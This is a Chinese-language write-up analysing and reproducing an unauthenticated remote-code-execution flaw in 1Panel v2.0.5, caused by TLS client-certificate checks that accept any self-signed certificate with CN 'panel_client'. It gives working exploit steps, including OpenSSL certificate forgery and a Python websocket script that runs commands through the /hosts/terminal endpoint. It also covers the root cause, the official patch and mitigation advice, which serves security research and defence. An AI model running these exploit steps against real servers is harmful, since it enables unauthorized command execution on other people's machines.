1Panel未授权RCE漏洞分析与复现指南<\/h1>

漏洞概述<\/h2>
1Panel是一款开源的Linux服务器运维管理面板，在v2.0.5版本中存在一个严重的未授权远程代码执行(RCE)漏洞。该漏洞源于TLS客户端证书验证机制存在缺陷，攻击者可以通过伪造客户端证书绕过认证，进而执行任意命令。<\/p>

影响版本<\/h2>

1Panel v2.0.5及之前版本<\/li> <\/ul>

漏洞原理<\/h2>

TLS认证机制缺陷<\/h3>

漏洞的核心在于1Panel的TLS认证策略配置不当：<\/p>

ClientAuth<\/span>: tls<\/span>.RequireAnyClientCert<\/span>
<\/span><\/span><\/code><\/pre>这个策略仅要求客户端提供证书，但不验证证书的可信性。因此任何格式正确的自签名证书都能通过TLS握手。<\/p>
二次验证绕过<\/h3>
虽然系统会检查客户端证书的CommonName(CN)字段是否为"panel_client"，但由于不验证证书合法性，攻击者可以：<\/p>

生成自签名证书<\/li>
设置CN=panel_client<\/li>
绕过认证<\/li>
<\/ol>
环境搭建<\/h2>
安装1Panel v2.0.5<\/h3>

下载安装包：<\/li>
<\/ol>
bash -c "<\/span>$(<\/span>curl -sSL https:\/\/resource.fit2cloud.com\/1panel\/package\/v2\/quick_start.sh)<\/span>"<\/span>
<\/span><\/span><\/code><\/pre>
如需指定版本，可下载特定版本安装包后手动安装<\/li>
<\/ol>
漏洞复现步骤<\/h2>
1. 生成伪造证书<\/h3>
使用OpenSSL生成自签名证书，设置CN=panel_client：<\/p>
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365<\/span> -nodes -subj "\/CN=panel_client"<\/span>
<\/span><\/span><\/code><\/pre>或使用Python脚本自动化生成。<\/p>
2. 验证证书有效性<\/h3>
发送带有伪造证书的HTTP请求验证是否绕过认证：<\/p>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>cert =<\/span> ('cert.pem'<\/span>, 'key.pem'<\/span>)
<\/span><\/span>response =<\/span> requests.<\/span>get('https:\/\/target:port\/api\/endpoint'<\/span>, cert=<\/span>cert, verify=<\/span>False<\/span>)
<\/span><\/span><\/code><\/pre>3. 建立WebSocket TLS连接<\/h3>
成功绕过认证后，建立WebSocket TLS连接：<\/p>
import<\/span> websockets
<\/span><\/span>
<\/span><\/span>async<\/span> def<\/span> exploit<\/span>():
<\/span><\/span>    ssl_context =<\/span> ssl.<\/span>create_default_context()
<\/span><\/span>    ssl_context.<\/span>load_cert_chain('cert.pem'<\/span>, 'key.pem'<\/span>)
<\/span><\/span>    async<\/span> with<\/span> websockets.<\/span>connect('wss:\/\/target:port\/hosts\/terminal'<\/span>, ssl=<\/span>ssl_context) as<\/span> websocket:
<\/span><\/span>        # 执行命令<\/span>
<\/span><\/span>        await<\/span> websocket.<\/span>send('{"type":"cmd","command":"whoami"}'<\/span>)
<\/span><\/span>        result =<\/span> await<\/span> websocket.<\/span>recv()
<\/span><\/span>        print(result)
<\/span><\/span><\/code><\/pre>4. 执行任意命令<\/h3>
通过以下接口执行命令：<\/p>


进程信息获取接口<\/strong>：<\/p>

路由地址: \/process\/ws<\/code><\/li>
请求格式: WebSocket消息<\/li>
<\/ul>
<\/li>

终端命令执行接口<\/strong>(主要RCE利用点)：<\/p>

路由地址: \/hosts\/terminal<\/code><\/li>
请求格式:
{
<\/span><\/span>  "type"<\/span>: "cmd"<\/span>,
<\/span><\/span>  "command"<\/span>: "要执行的命令"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ol>
漏洞分析<\/h2>
路由鉴权机制<\/h3>

路由文件定义了不同功能对应的端点<\/li>
访问路由需要加上前缀<\/li>
验证使用middleware.Certificate()<\/code>中间件<\/li>
<\/ol>
TLS验证实现<\/h3>
具体实现在agent\/server\/server.go<\/code>中：<\/p>

使用tls.RequireAnyClientCert<\/code>策略<\/li>
仅检查证书CN是否为"panel_client"<\/li>
不验证证书合法性<\/li>
<\/ol>
漏洞修复<\/h2>
官方修复方案：<\/p>

修改TLS认证策略为：
ClientAuth<\/span>: tls<\/span>.RequireAndVerifyClientCert<\/span>
<\/span><\/span><\/code><\/pre><\/li>
要求客户端提供证书并验证合法性<\/li>
只接受服务端签发的证书<\/li>
<\/ol>
修复提交：

https:\/\/github.com\/1Panel-dev\/1Panel\/pull\/9698\/commits\/4003284521f8d31ddaf7215d1c30ab8b4cdb0261<\/p>
安全建议<\/h2>

立即升级到最新版本<\/li>
如无法立即升级，限制面板管理端口访问<\/li>
监控异常证书验证请求<\/li>
<\/ol>
免责声明<\/h2>
本文档仅供安全研究和学习使用。任何因传播、利用本文档信息而产生的直接或间接后果或损害，均由使用者自行承担。<\/p>

1Panel未授权RCE漏洞分析与复现指南<\/h1>

漏洞原理<\/h2>

环境搭建<\/h2>

漏洞复现步骤<\/h2>

漏洞分析<\/h2>

免责声明<\/h2> 本文档仅供安全研究和学习使用。任何因传播、利用本文档信息而产生的直接或间接后果或损害，均由使用者自行承担。<\/p>

免责声明<\/h2>
本文档仅供安全研究和学习使用。任何因传播、利用本文档信息而产生的直接或间接后果或损害，均由使用者自行承担。<\/p>